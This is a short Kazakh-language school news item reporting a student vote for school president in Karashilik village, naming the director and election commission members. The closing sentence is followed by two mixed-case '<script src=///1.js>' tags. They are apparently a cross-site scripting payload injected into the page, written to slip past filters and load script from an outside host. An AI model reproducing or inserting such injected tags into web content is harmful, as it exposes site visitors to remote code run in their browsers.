Қарашілік ауылының жалпы орта білім беретін мектебінде мектеп Президентін сайлауға байланысты үміткерлерге дауыс беру өткізілді. Дауыс беруге 5-11 сыныптармен қатар мектебіміздің ұстаздары да қатысты. Үміткерлер өздерінің бағдарламаларын оқушылармен бөлісіп және интернет желілеріне жариялады. Мектеп директоры Уалиева М.Б. үміткерлерге сәттілік тілеп, құттықтап өз таңдауын жасады. Комиссия төрайымдары Қайрат Жумадилович пен Күнсұлу Төбетовна әр дауыс берушілердің аты-жөндерін жазып алып , бюллетендерін берді. Мектебіміздің оқушылары сайлауға бір адамдай жұмыла қатысты.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>